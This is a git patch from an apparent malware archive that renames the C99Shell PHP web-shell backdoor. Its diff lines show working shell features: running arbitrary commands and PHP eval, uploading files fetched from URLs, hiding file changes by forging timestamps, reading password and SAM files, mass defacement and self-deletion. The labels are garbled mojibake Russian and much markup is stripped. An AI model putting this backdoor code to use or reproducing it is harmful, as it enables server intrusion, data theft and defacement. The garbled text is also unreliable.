From 30155b8d4d732e35ce69ae932127ebe40e3b2d20 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Thu, 15 Oct 2020 20:44:38 -0500 Subject: [PATCH] Rename Backdoor.PHP.C99Shell.af to Backdoor.PHP.Rodnoc --- ...or.PHP.C99Shell.af => Backdoor.PHP.Rodnoc} | 186 +++++++++--------- 1 file changed, 93 insertions(+), 93 deletions(-) rename PHP/{Backdoor.PHP.C99Shell.af => Backdoor.PHP.Rodnoc} (90%) diff --git a/PHP/Backdoor.PHP.C99Shell.af b/PHP/Backdoor.PHP.Rodnoc similarity index 90% rename from PHP/Backdoor.PHP.C99Shell.af rename to PHP/Backdoor.PHP.Rodnoc index cf989d4c..647333aa 100644 --- a/PHP/Backdoor.PHP.C99Shell.af +++ b/PHP/Backdoor.PHP.Rodnoc @@ -67,14 +67,14 @@ $quicklaunch[] = array("",""); $quicklaunch[] = array("",$sul."act=fsbuff&d=%d"); $quicklaunch1 = array(); -$quicklaunch1[] = array("",$sul."act=ps_aux&d=%d"); -$quicklaunch1[] = array("",$sul."act=lsa&d=%d"); -$quicklaunch1[] = array("",$sul."act=cmd&d=%d"); -$quicklaunch1[] = array("",$sul."act=upload&d=%d"); -$quicklaunch1[] = array("",$sul."act=sql&d=%d"); -$quicklaunch1[] = array("PHP-",$sul."act=eval&d=%d"); -$quicklaunch1[] = array("PHP-",$sul."act=phpinfo\" target=\"blank=\"_target"); -$quicklaunch1[] = array(" ",$sul."act=selfremove"); +$quicklaunch1[] = array("Ïðîöåññû",$sul."act=ps_aux&d=%d"); +$quicklaunch1[] = array("Ïàðîëè",$sul."act=lsa&d=%d"); +$quicklaunch1[] = array("Êîìàíäû",$sul."act=cmd&d=%d"); +$quicklaunch1[] = array("Çàãðóçêà",$sul."act=upload&d=%d"); +$quicklaunch1[] = array("Áàçà",$sul."act=sql&d=%d"); +$quicklaunch1[] = array("PHP-Êîä",$sul."act=eval&d=%d"); +$quicklaunch1[] = array("PHP-Èíôî",$sul."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch1[] = array("Ñàì óäàëÿþò",$sul."act=selfremove"); $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; @@ -699,7 +699,7 @@ foreach($pd as $b) "; if (!$sql_sock) {?> +
  • Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïðîöåññà.
    • +
  • Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost
    • +
  • Åñëè ïîðò ÿâëÿåòñÿ ïóñòûì, ïîðò - 3306 (íåïëàòåæ)
    • - - +Èíñòðóìåíòû - - +Èíôîðìàòîð @@ -759,7 +759,7 @@ echo "
    if ($win) { ?> - - + - Äèñêè @@ -830,10 +830,10 @@ if ($act == "sql") if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();} } else {$sql_sock = false;} - echo " SQL:
    "; + echo "Ìåíåäæåð SQL:
    "; if (!$sql_sock) { - if (!$sql_server) {echo " ";} + if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";} else {echo "
    Can't connect
    "; echo "".$err."";} } else @@ -854,17 +854,17 @@ if ($act == "sql") } echo "

    -
  • , - .
    • -
  • , - localhost
    • -
  • , - 3306 ()
    		•  - -
      : - +".htmlspecialchars($sql_db)." ]---
    "; $c = 0; - while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo " ".htmlspecialchars($row[0])." (".$count_row[0].")
     + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
     "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } @@ -896,7 +896,7 @@ else while ($row = mysql_fetch_row($result)) {echo " "; $c++;} } -?>
    ,
    Ïîæàëóéñòà, âûáåðèòå áàçó äàííûõ
    "; - echo ""; + echo ""; echo ""; echo ""; echo ""; @@ -1013,7 +1013,7 @@ else $acts = array("","newdb","serverstat","servervars","processes","getfile"); if (in_array($sql_act,$acts)) { - ?>
    ::
     Çàïîëíèòå ôîðìó: + - - + + +
    Èìÿ:Ïàðîëü:
    -
    ::
    Õîñò:Ïîðò:
    		"; if ($sql_db) @@ -986,7 +986,7 @@ else $i++; } echo "
    »
    ".$i." table(s)
    		".$trows."".$row[1]."
    :
     
    		 :
     
    Ñîçäàéòå íîâûé Áàçó:
     
    		Ïðèñìîòðåòü Ôàéëà:
     
    Killing process #".$kill."... ok. he is dead, amen.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); - echo "
    :

    "; + echo "
    Ïðîöåññû:

    "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; @@ -1136,10 +1136,10 @@ $success++; } if ($act == "lsa") { - echo "
    :
    "; - echo " : ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; - echo ": ".$hsafemode."
    "; - echo " : ".$hopenbasedir."
    "; + echo "
    Èíôîðìàöèÿ áåçîïàñíîñòè ñåðâåðà:
    "; + echo "Ïðîãðàììíîå îáåñïå÷åíèå: ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; + echo "Áåçîïàñíîñòü: ".$hsafemode."
    "; + echo "Îòêðûòûé îñíîâíîé äèðåêòîð: ".$hopenbasedir."
    "; if (!$win) { if ($nixpasswd) @@ -1165,7 +1165,7 @@ while ($i < $num) { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} - else {echo " winnt . , c lcp.crack+.
    ";} + else {echo "Âû ìîæåòå âçëîìàòü winnt ïàðîëè. Ñêà÷àòü, c èñïîëüçîâàíèå lcp.crack+.
    ";} } } if ($act == "mkfile") @@ -1206,7 +1206,7 @@ if ($act == "selfremove") $v[] = "YES"; shuffle($v); $v = join("   ",$v); - echo ": ".__FILE__."
    ?
    ".$v."
    "; + echo "Ñàìîóäàëèòü: ".__FILE__."
    Âû óâåðåííû?
    ".$v."
    "; } } if ($act == "massdeface") @@ -1332,11 +1332,11 @@ if ($act == "chmod") $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; $ret = @chmod($d.$f, $sum_chmod); if ($ret) {$act = "ls";} - else {echo " (".$d.$f."):
    ";} + else {echo "Èçìåíåíèå Àòðèáóò Ôàéëà (".$d.$f."): Îøèáêà
    ";} } else { - echo "

    "; + echo "
    Èçìåíåíèå Àòðèáóò Ôàéëà
    "; $perms = view_perms(fileperms($d.$f)); $length = strlen($perms); $owner_r = $owner_w = $owner_x = @@ -1360,7 +1360,7 @@ if ($act == "chmod")
    		World

    Read
    Write
    Execute
    "; +"; } } if ($act == "upload") @@ -1377,7 +1377,7 @@ if ($act == "upload") { if (empty($uploadfilename)) {$destin = $uploadfile[name];} else {$destin = $userfilename;} -if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= ", ".$uploadfile[name]." ( \"".$uploadfile[tmp_name]."\" \"".$uploadpath.$destin."\"!
    ";} +if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãðóæàþùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèðîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!
    ";} } elseif (!empty($uploadurl)) { @@ -1398,12 +1398,12 @@ else $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); - if (!$content) {$uploadmess .= " !
    ";} + if (!$content) {$uploadmess .= "Íå ìîæåò çàãðóçèòü ôàéë!
    ";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); - if (!$fp) {$uploadmess .= ", ".htmlspecialchars($destin)."!
    ";} + if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!
    ";} else { fwrite($fp,$content,strlen($content)); @@ -1421,13 +1421,13 @@ if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } else { - echo " :
    ".$uploadmess."
    - :

                   
    - URL:


    - :


    - :
    - 

    - + echo "Çàãðóçêà Ôàéëà:
    ".$uploadmess." +Ëîêàëüíûé ôàéë:

                   èëè
    +Çàãðóçèòü èç URL:


    +Ñîõðàíèòü ýòîò ôàéëü â ïàïêó:


    +Èìÿ Ôàéëà:
    + Êîíâåðòèðîâàòü èìÿ ôàéëà

    +
    "; } } @@ -1438,8 +1438,8 @@ if ($act == "delete") { $result = false; $result = fs_rmobj($v); - if (!$result) {$delerr .= " ".htmlspecialchars($v)."
    ";} - if (!empty($delerr)) {echo " :
    ".$delerr;} + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} } $act = "ls"; } @@ -1448,8 +1448,8 @@ if ($act == "onedelete") $delerr = ""; $result = false; $result = fs_rmobj($f); - if (!$result) {$delerr .= " ".htmlspecialchars($f)."
    ";} - if (!empty($delerr)) {echo " :
    ".$delerr;} + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} $act = "ls"; } if ($act == "onedeleted") @@ -1457,8 +1457,8 @@ if ($act == "onedeleted") $delerr = ""; $result = false; $result = fs_rmobj($d+'/'+$f); - if (!$result) {$delerr .= " ".htmlspecialchars($f)."
    ";} - if (!empty($delerr)) {echo " :
    ".$delerr;} + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} $act = "ls"; } if ($act == "deface") @@ -1494,17 +1494,17 @@ else foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); -if (!fs_copy_obj($v,$d)) {$psterr .= " ".$v." to ".$to."!
    ";} +if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!
    ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); -if (!fs_move_obj($v,$d)) {$psterr .= " ".$v." to ".$to."!
    ";} +if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!
    ";} unset($sess_data["cut"][$k]); } ct_sess_put($sess_data); - if (!empty($psterr)) {echo " :
    ".$psterr;} + if (!empty($psterr)) {echo "Ïðèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;} $act = "ls"; } elseif ($actarcbuff) @@ -1529,7 +1529,7 @@ if (is_dir($v)) $cmdline .= " ".$v; } $ret = `$cmdline`; - if (empty($ret)) {$arcerr .= " archivator!
    ";} + if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!
    ";} $ret = str_replace("\r\n","\n"); $ret = explode("\n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} @@ -1548,17 +1548,17 @@ unset($sess_data["cut"][$k]); foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); -if (!fs_copy_obj($v,$d)) {$psterr .= " ".$v." to ".$to."!
    ";} +if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!
    ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); -if (!fs_move_obj($v,$d)) {$psterr .= " ".$v." to ".$to."!
    ";} +if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!
    ";} unset($sess_data["cut"][$k]); } ct_sess_put($sess_data); - if (!empty($psterr)) {echo " :
    ".$psterr;} + if (!empty($psterr)) {echo "Ïðèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;} $act = "ls"; } } @@ -1574,7 +1574,7 @@ while ($o = readdir($h)) {$list[] = $d.$o;} closedir($h); } } - if (count($list) == 0) {echo "
    (".htmlspecialchars($d).")!
    ";} + if (count($list) == 0) {echo "
    Íå ìîæåò îòêðûòü ñïðàâî÷íèê (".htmlspecialchars($d).")!
    ";} else { $tab = array(); @@ -1583,13 +1583,13 @@ closedir($h); if ($vd == "f") { $row = array(); -$row[] = "
    "; -$row[] = "
    "; -$row[] = "
    "; +$row[] = "
    Èìÿ"; +$row[] = "
    Ðàçìåð
    "; +$row[] = "
    Èçìåíåí
    "; if (!$win) - {$row[] = "
    /
    ";} -$row[] = "
    "; -$row[] = "
    "; + {$row[] = "
    Âëàäåëåö/Ãðóïïà
    ";} +$row[] = "
    Ïðàâà
    "; +$row[] = "
    Ôóíêöèè
    "; $k = $sort[0]; if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} @@ -1701,22 +1701,22 @@ echo "\r\n"; echo " - +
    -: ".(count($tab[dirs])+count($tab[links]))." : ".count($tab[files]).""; +Ïàïêè: ".(count($tab[dirs])+count($tab[links]))." Ôàéëû: ".count($tab[files]).""; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { -echo "                   "; +echo "                   "; } - echo ""; + echo ""; if ($usefsbuff) { -echo ""; -echo ""; -echo ""; +echo ""; +echo ""; +echo ""; } - if ($dspact == "massdeface") {echo "";} - echo " "; + if ($dspact == "massdeface") {echo "";} + echo " "; echo ""; echo "
    "; @@ -1728,7 +1728,7 @@ if ($act == "cmd") { if (!empty($submit)) { - echo " :
    "; + echo "Ðåçóëüòàò âûïîëíåíèÿ ýòà êîìàíäà:
    "; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); @@ -1761,12 +1761,12 @@ else {echo $ret;} } @chdir($olddir); } - else {echo " :"; if (empty($cmd_txt)) {$cmd_txt = true;}} - echo "


    "; + else {echo "Êîìàíäà âûïîëíåíèÿ:"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


    "; } if ($act == "ps_aux") { - echo ":
    "; + echo "Ïðîöåññû:
    "; if ($win) { echo "
    ";
 system('tasklist');
@@ -1818,7 +1818,7 @@ if ($act == "eval")
 {
  if (!empty($eval))
  {
-  echo "   PHP-:
    ";
+  echo "Ðåçóëüòàò âûïîëíåíèÿ ýòîò PHP-êîä:
    ";
   $tmp = ob_get_contents();
   $olddir = realpath(".");
   @chdir($d);
@@ -1851,8 +1851,8 @@ else {echo $ret;}
   }
   @chdir($olddir);
  }
- else {echo "PHP- "; if (empty($eval_txt)) {$eval_txt = true;}}
- echo "


    ";
+ else {echo "PHP-êîä âûïîëíåíèÿ"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "


    ";
 }
 if ($act == "f")
 {
@@ -1876,8 +1876,8 @@ if (in_array($ext,$v)) {$rft = $k; break;}
   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
   if (empty($ft)) {$ft = $rft;}
 
-  echo " :     ".$f." (".view_size(filesize($d.$f)).")      ";
-  if (is_writable($d.$f)) {echo "  / (".view_perms(fileperms($d.$f)).")";}
+  echo "Ðàññìîòðåíèå ôàéëà:     ".$f." (".view_size(filesize($d.$f)).")      ";
+  if (is_writable($d.$f)) {echo "Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")";}
   else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";}
  
   echo "
    ";
@@ -2102,7 +2102,7 @@ if (!empty($submit))
  if (!$fp) {echo "Can't write to file!";}
  else
  {
-  echo "!!!";
+  echo "Ñîõðàí¸íü!!!";
   fwrite($fp,$nfcontent);
   fclose($fp);
   if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
@@ -2113,7 +2113,7 @@ $rows = count(explode("
 ",$r));
 if ($rows < 10) {$rows = 10;}
 if ($rows > 30) {$rows = 30;}
-echo "
      
    ";
+echo "
      
    ";
   }
   elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";}
   else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";}
@@ -2917,11 +2917,11 @@ echo $u.":
    ";
 }
 if ($act == "about")
 {
- $dta = "Any stupid copyrights and copylefts";
+ $dàta = "Any stupid copyrights and copylefts";
  echo $data;
 }
 
 $microtime = round(getmicrotime()-$starttime,4);
 
 ?>
-
\ No newline at end of file
+